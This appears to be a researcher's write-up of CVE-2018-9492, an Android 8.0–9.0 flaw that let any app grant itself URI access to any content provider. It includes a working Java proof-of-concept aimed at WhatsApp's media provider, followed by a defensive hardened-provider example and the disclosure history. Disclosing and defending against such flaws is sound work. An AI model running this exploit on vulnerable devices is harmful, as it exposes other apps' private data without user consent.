Global grant uri in Android 8.0-9.0 (2018 year)
Any third-party application was able to grant itself read/write access to any content provider installed in the system, whether exported or not and whether protected by permissions or not. It did not matter whether the content provider was declared in AndroidManifest with the grantUriPermissions attribute, or whether it was exported. A third-party app could access any content provider in the system without user interaction.
// Target content URI from the report: a non-exported, permission-protected provider.
Uri uri = Uri.parse("content://com.whatsapp.provider.media/item/5");
// The intent targets the app's own main activity, so no other app takes part.
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
// On affected builds the framework honoured these grant flags for the URI
// even though the provider never allowed URI grants.
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
// The URI rides along as EXTRA_STREAM, which is what the grant applies to.
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);
And that's all :) When you launch that code on a vulnerable Android build, your app receives access to the passed "uri" value. You can open any content provider in the system!
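For a provider author, the lesson is that the framework's URI-permission check is not the only line of defence. The following is an added example, not code from the original post or from the researcher credited below: a ContentProvider that enforces its own permission on every caller with Context.checkCallingPermission(), which consults only the permission actually held by the calling UID and never URI grants, so a grant obtained the way described above does not pass it. The package name, authority and permission string are hypothetical placeholders.

```java
// Added example: a ContentProvider that refuses callers lacking its own
// permission regardless of any URI-permission grant they may hold.
// Package, permission and authority names are hypothetical placeholders.
package com.example.hardened;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.pm.PackageManager;
import android.database.Cursor;
import android.database.MatrixCursor;
import android.net.Uri;
import android.os.Binder;
import android.os.ParcelFileDescriptor;
import android.os.Process;
import android.util.Log;

import java.io.FileNotFoundException;

public class HardenedMediaProvider extends ContentProvider {
    private static final String TAG = "HardenedMediaProvider";
    // Hypothetical signature-level permission declared in this app's manifest.
    static final String READ_PERMISSION = "com.example.hardened.permission.READ_MEDIA";

    @Override
    public boolean onCreate() {
        return true;
    }

    // Explicit caller check. The framework's own check passes when the caller
    // holds a URI grant; this check ignores grants and asks only whether the
    // calling UID holds READ_PERMISSION itself.
    private void enforceCaller(Uri uri) {
        int callingUid = Binder.getCallingUid();
        // Calls from our own process are not IPC, so checkCallingPermission()
        // would always fail for them; allow them explicitly.
        if (callingUid == Process.myUid()) {
            return;
        }
        if (getContext().checkCallingPermission(READ_PERMISSION)
                != PackageManager.PERMISSION_GRANTED) {
            // Log the refusal so an unexpected client is visible in logcat.
            Log.w(TAG, "Refusing " + uri + " for uid " + callingUid
                    + " (pkg " + getCallingPackage() + "): permission not held");
            throw new SecurityException("Permission " + READ_PERMISSION + " required");
        }
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        enforceCaller(uri);
        // Real provider logic would go here; constructed empty result for the example.
        return new MatrixCursor(new String[] {"_id", "_display_name"});
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        enforceCaller(uri);
        // No file backing in this example; a real provider would open its file here.
        throw new FileNotFoundException("No file backing " + uri);
    }

    @Override
    public String getType(Uri uri) {
        return "application/octet-stream";
    }

    @Override
    public Uri insert(Uri uri, ContentValues values) {
        enforceCaller(uri);
        return null;
    }

    @Override
    public int delete(Uri uri, String selection, String[] selectionArgs) {
        enforceCaller(uri);
        return 0;
    }

    @Override
    public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
        enforceCaller(uri);
        return 0;
    }
}
```

The trade-off is that this check also rejects legitimate URI grants (for example a document shared to another app with FLAG_GRANT_READ_URI_PERMISSION), so it only suits providers meant for a closed set of apps that hold the permission; for a provider that is supposed to hand out per-URI grants, the platform fix remains the real remedy.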
PoC demo:
This funny bug was reported on 30.08.2018.
And then: "The Android Security Team believes that this is a duplicate of a report previously submitted by another external researcher on July 26, 2018."
So, for me it was a duplicate.
Original bug information:
- CVE-2018-9492
- Author: Michał Bednarski